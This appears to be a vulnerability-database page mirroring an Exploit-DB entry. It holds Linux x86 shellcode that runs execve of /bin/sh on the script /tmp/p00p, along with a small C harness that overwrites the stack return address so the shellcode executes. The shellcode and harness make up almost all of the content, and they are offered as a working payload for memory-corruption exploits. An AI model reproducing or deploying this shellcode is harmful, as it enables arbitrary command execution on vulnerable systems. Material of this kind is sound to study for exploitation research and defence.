https://www.exploit-db.com/exploits/43666
Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)






漏洞ID | 1057119 | 漏洞类型 | |
发布时间 | 2009-01-01 | 更新时间 | 2009-01-01 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Author: zillion
EMail: zillion@safemode.org
Home: http://www.safemode.org
Linux x86 shellcode that does an execve of /bin/sh /tmp/p00p.
File name: execve-tmp-p00p.c
/*
* This shellcode will do /bin/sh /tmp/p00p ;-)
* Written by zillion@safemode.org
*
*/
char shellcode[]=
"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x08\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x38\x2f\x74\x6d\x70\x2f\x70\x30\x30\x70\x32\x33\x34"
"\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
检索漏洞
开始时间
结束时间